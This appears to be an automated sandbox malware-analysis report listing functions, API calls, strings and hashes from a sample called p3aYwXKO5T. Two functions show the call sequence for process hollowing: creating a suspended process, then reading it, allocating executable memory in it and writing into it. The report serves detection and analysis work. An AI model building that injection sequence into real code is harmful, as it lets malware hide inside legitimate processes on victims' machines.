Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 415ea3c0f60fbb919f0de1e7ecd48c700f1ce753700b7490503a0b58732da5ff
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D8526A75A01229DFDB64CF58C984BACBBB5BF09304F1480D9E94DAB351DB30AA89CF14

Function 0040DACC Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49a191702b5d5566f94e71338abaa26562628b50816476b24f9623ef3bb52aa2
Instruction ID: 38f2449521b5e83f10c936fa6f8dfcbe512f937044bec88a97e9488449440713
Opcode Fuzzy Hash: 49a191702b5d5566f94e71338abaa26562628b50816476b24f9623ef3bb52aa2
Instruction Fuzzy Hash: E941D472E041145BDB28CBB8CC857AEB7B5EF45324F10466EE815F33D1DA749944CB49

Function 004077B0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00407A79

Strings

runas, xrefs: 00407303

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: ee738bf8bf9f0de906e0374f4d219b384e7ae33defb4495508657303e1c5108b
Instruction ID: 16d312adbf3c5a63ffdf7f0f3d7c95d875241b4f4b30525d3919e6496bc747c1
Opcode Fuzzy Hash: ee738bf8bf9f0de906e0374f4d219b384e7ae33defb4495508657303e1c5108b
Instruction Fuzzy Hash: D0E13C71E14144ABEB08EB78CD8679D7B72DF42304F60815EF405A73C6DB7D9A80879A

Function 0040C3A6 Relevance: 3.5, APIs: 2, Instructions: 532
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00417AF8
Part of subcall function 00417A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00417B01

Sleep.KERNEL32(000003E8), ref: 0040C7F9

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
String ID:
API String ID: 113500496-0
Opcode ID: 0a7cb503edac44424bd4f6975314c444da3cd61ca8811e0566eebd0e793d9507
Instruction ID: 5a5a39bdf66b3153d44a1018dc39ac7d8d4adb77eca0788226074bda14c0a91d
Opcode Fuzzy Hash: 0a7cb503edac44424bd4f6975314c444da3cd61ca8811e0566eebd0e793d9507
Instruction Fuzzy Hash: 4512A071A00108DBDB04DF68CDC5BDEBBB5EF49304F54822EE805A72D2D7399A85CB99

Function 00416D30 Relevance: 3.0, APIs: 2, Instructions: 23
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00409A00: Sleep.KERNELBASE(00000064), ref: 0040A963
Part of subcall function 00409A00: CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
Part of subcall function 00409A00: GetLastError.KERNEL32 ref: 0040A989
Part of subcall function 00409A00: GetLastError.KERNEL32 ref: 0040A99A

Part of subcall function 00405C10: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040617D

CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00416D10
Sleep.KERNEL32(00007530), ref: 00416D25

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CreateErrorLastSleep$MutexOpenThread
String ID:
API String ID: 2377761554-0
Opcode ID: 6382081bcbf8a9ed3d33521cf0e432a915f352317681496325614467e45a9fec
Instruction ID: 0e677149ad7de975180ec068863c876e2b41020de11884c8df8d41ceb524a5b2
Opcode Fuzzy Hash: 6382081bcbf8a9ed3d33521cf0e432a915f352317681496325614467e45a9fec
Instruction Fuzzy Hash: 1FE08C75784304A6E21033F27C0BF997A109F09F15F26013AB25A3A1D2D9ECB08086EF

Function 02320E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02320223,?,?), ref: 02320E19
SetErrorMode.KERNELBASE(00000000,?,?,02320223,?,?), ref: 02320E1E

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 26fddfea30a0010a55aa19c00e5c5b141b46e34e15abc854e8770eeee56b9916
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: EDD0123114512877D7002A94DC09BCD7B1CDF05B66F008011FB0DD9080C770954046E5

Function 0040D159 Relevance: 1.9, APIs: 1, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D167

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 9df6dc6c6b6516bd832a521bdb968700339736e89c6f6026bf061d540936f4fe
Instruction ID: 136bb09125c68fe2e081d2bed29a15b875233fc51c93fcab2b4112f563e43fa9
Opcode Fuzzy Hash: 9df6dc6c6b6516bd832a521bdb968700339736e89c6f6026bf061d540936f4fe
Instruction Fuzzy Hash: 30E11971E002549BEB19DB68CD497DDBB71AF46308F1042DED4086B3C2DB799BC88B99

Function 0040D6D0 Relevance: 1.7, APIs: 1, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c18bc24b5b40a2134f91a76ed29d8d8ee532285b02a30a0b6b595c82aba4457
Instruction ID: 6ba3f6d73affff0805543805238ddc276f563b6c65a7d1c94091dbc822e03449
Opcode Fuzzy Hash: 8c18bc24b5b40a2134f91a76ed29d8d8ee532285b02a30a0b6b595c82aba4457
Instruction Fuzzy Hash: 2051FD70D042589BEB24DB68CD88BDEBBB1AB46304F5041EAD408672C2DB795FC8CF85

Function 0040C8E0 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4513db9c8ca4ea5d03b4e6baea22fc72861bf157a0bb9fd0c640f3efb5b9add
Instruction ID: 6f1343131b8dd863bc46bdb2e422fc6909b0f8608393747acf9dbc8e3f269829
Opcode Fuzzy Hash: c4513db9c8ca4ea5d03b4e6baea22fc72861bf157a0bb9fd0c640f3efb5b9add
Instruction Fuzzy Hash: 38315C7161024CAFEB04DFA8C985BDEBBB5FB49704F50422AF805A72C1D7799980CB98

Function 0043AC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0043AC8D

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
Instruction ID: a66abbd6648e96b8c426010f02d88ffd1877682ffd29169a79776235427ef3c3
Opcode Fuzzy Hash: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
Instruction Fuzzy Hash: 551118B1A0420AAFCB05DF59E94199B7BF4EF48304F04406AF805AB351D670DD21DB69

Function 00441A2E Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00441A91

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0da8171cac030f6b45925a7c5248a00485fab8e2398974f4a4f83c3fb58f0ae8
Instruction ID: c9b0d8fa498f0fd219daed50f945327353b6da4e75b16bd436644be4f456858a
Opcode Fuzzy Hash: 0da8171cac030f6b45925a7c5248a00485fab8e2398974f4a4f83c3fb58f0ae8
Instruction Fuzzy Hash: DE014F72C01159BFDF01EFE88C01AEE7FB5AF08314F14416AF914F2161E6358A65DB95

Function 00441775 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
Instruction ID: 728716dea2d8701cc34847fc6eeab83fc4e7ccc419190b368175d6442f09313a
Opcode Fuzzy Hash: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
Instruction Fuzzy Hash: 10D06C3201020DBBDF028F84DC06EDE3BAAFB48715F014150BA1856020C732E861AB94

Function 004087B2 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 004087B9

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
Instruction ID: cf245ddd44955969ee6657244a22e3e52baad1822ae61319476e7950b8878db5
Opcode Fuzzy Hash: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
Instruction Fuzzy Hash: CEC0803801060006DD1C06385F49555330655537B53F40BBDE4F16B2F5CB3D5807D608

Function 004087B0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 004087B9

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
Instruction ID: eec6361e8626f86b60cf0449171d9436f9a85d39230ea77d0a5306f3f4484108
Opcode Fuzzy Hash: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
Instruction Fuzzy Hash: 83C0803801020047DA1C4B386F49515331699537353F00B7DE4B16B2F5CB3EC403C758

Function 0079FD95 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0079FDE6

Memory Dump Source

Source File: 00000000.00000002.1686331848.000000000079F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79f000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d75c76d936ffd541cd77d8118af8c6bbdc34c401481df77c4d3b1e4492bcbc03
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 43113C79A00208EFDB01DF98C985E99BBF5AF08350F0580A4F9489B362D375EA50DF90

Non-executed Functions

Function 0041C768 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C76E
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C77C
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C78D
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C79E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C7AF
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C7C0
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C7D1
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C7E2
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C7F3
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C804
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C815
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C826
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C837
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C848
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C859
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C86A
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C87B
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C88C
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C89D
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C8AE
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C8BF
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C8D0
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C8E1
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041C8F2
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041C903
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041C914
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041C925
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041C936
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041C947
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041C958
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041C969
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041C97A
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041C98B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041C99C
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041C9AD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041C9BE
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041C9CF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041C9E0
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041C9F1
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041CA02
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041CA13

Strings

GetTickCount64, xrefs: 0041C8D6
CreateThreadpoolTimer, xrefs: 0041C80A
TryAcquireSRWLockExclusive, xrefs: 0041C980
GetFileInformationByHandleEx, xrefs: 0041C8E7
SleepConditionVariableSRW, xrefs: 0041C9A2
InitializeSRWLock, xrefs: 0041C95E
FlsSetValue, xrefs: 0041C7A4
GetLocaleInfoEx, xrefs: 0041C9F7
CloseThreadpoolWork, xrefs: 0041C9D5
GetCurrentPackageId, xrefs: 0041C8C5
WakeAllConditionVariable, xrefs: 0041C93C
AcquireSRWLockExclusive, xrefs: 0041C96F
SetThreadpoolTimer, xrefs: 0041C81B
LCMapStringEx, xrefs: 0041CA08
FlsFree, xrefs: 0041C782
FlsGetValue, xrefs: 0041C793
InitOnceExecuteOnce, xrefs: 0041C7C6
SetThreadpoolWait, xrefs: 0041C85F
CompareStringEx, xrefs: 0041C9E6
WaitForThreadpoolTimerCallbacks, xrefs: 0041C82C
ReleaseSRWLockExclusive, xrefs: 0041C991
SubmitThreadpoolWork, xrefs: 0041C9C4
CreateSemaphoreExW, xrefs: 0041C7F9
GetSystemTimePreciseAsFileTime, xrefs: 0041C909
CreateEventExW, xrefs: 0041C7D7
FlsAlloc, xrefs: 0041C776
CreateSemaphoreW, xrefs: 0041C7E8
CreateThreadpoolWork, xrefs: 0041C9B3
SetFileInformationByHandle, xrefs: 0041C8F8
SleepConditionVariableCS, xrefs: 0041C94D
WakeConditionVariable, xrefs: 0041C92B
FlushProcessWriteBuffers, xrefs: 0041C881
kernel32.dll, xrefs: 0041C769
InitializeConditionVariable, xrefs: 0041C91A
CreateThreadpoolWait, xrefs: 0041C84E
CloseThreadpoolTimer, xrefs: 0041C83D
GetCurrentProcessorNumber, xrefs: 0041C8A3
CreateSymbolicLinkW, xrefs: 0041C8B9
FreeLibraryWhenCallbackReturns, xrefs: 0041C892
InitializeCriticalSectionEx, xrefs: 0041C7B5
CloseThreadpoolWait, xrefs: 0041C870

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 7095254045faed2553d93f0c9490efac9b80fc04d73eb81a88eda45e0edda8b1
Instruction ID: b27cf2173bd35c32a824bf4ef6feeb97883ccbcf9f0634586d8c00e0a98c48d7
Opcode Fuzzy Hash: 7095254045faed2553d93f0c9490efac9b80fc04d73eb81a88eda45e0edda8b1
Instruction Fuzzy Hash: A5612A75952710EBD7016FB4BC4DF893AB8EA09B93B608537F905D21B2E6F88104CB6D

Function 004070A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004070CD
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040712B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00407144
GetThreadContext.KERNEL32(?,00000000), ref: 00407159
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00407179
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004071BB
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004071D8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407291

Strings

, xrefs: 00407170
invalid stoi argument, xrefs: 00407090
VUUU, xrefs: 00406F41

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 27f6c6112b243df7e53398a743d978e592acbef08456db8e92c72c1a99b34ae4
Instruction ID: 38b2a2fa096ae382cc622da32822fc99d79a3e7951b2d8ee4b07a12606b8df86
Opcode Fuzzy Hash: 27f6c6112b243df7e53398a743d978e592acbef08456db8e92c72c1a99b34ae4
Instruction Fuzzy Hash: 59418D74644301BFE7609F50DC06FAA7BE8BF88B05F000529FA84E62D1D7B4E944CB9A

Function 02327157 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 174processmemorythreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02327334
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02327392
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 023273AB
GetThreadContext.KERNEL32(?,00000000), ref: 023273C0
ReadProcessMemory.KERNEL32(?,00458DF8,?,00000004,00000000), ref: 023273E0

Strings

VUUU, xrefs: 023271A8

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Process$AllocContextCreateFileMemoryModuleNameReadThreadVirtual
String ID: VUUU
API String ID: 338953623-2040033107
Opcode ID: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
Instruction ID: 65dafbe881e333beea0a744aa24ea978a97c9c2ce8690e34c96e5114cc94b61b
Opcode Fuzzy Hash: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
Instruction Fuzzy Hash: 4B51B371644300AFD7209F64DC05F6ABBE9BF84B15F404529FA48E62D0DB74E904CF5A

Function 0234107A Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0234117D
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 023411C9

Part of subcall function 023428C4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 023429B7

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02341235
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 02341251
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 023412A5
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 023412D2
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02341328

Strings

(, xrefs: 02341189

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
Instruction ID: 17eb3e399e105ae6e976ea2c39de04b7d74db9c3276559a56cb2d87405c76a65
Opcode Fuzzy Hash: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
Instruction Fuzzy Hash: ECB18F70A00A15AFDB28CF58D980B7EB7F5FF44704F1441A9D889AB654DB70F981CBA4

Function 00420E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F16
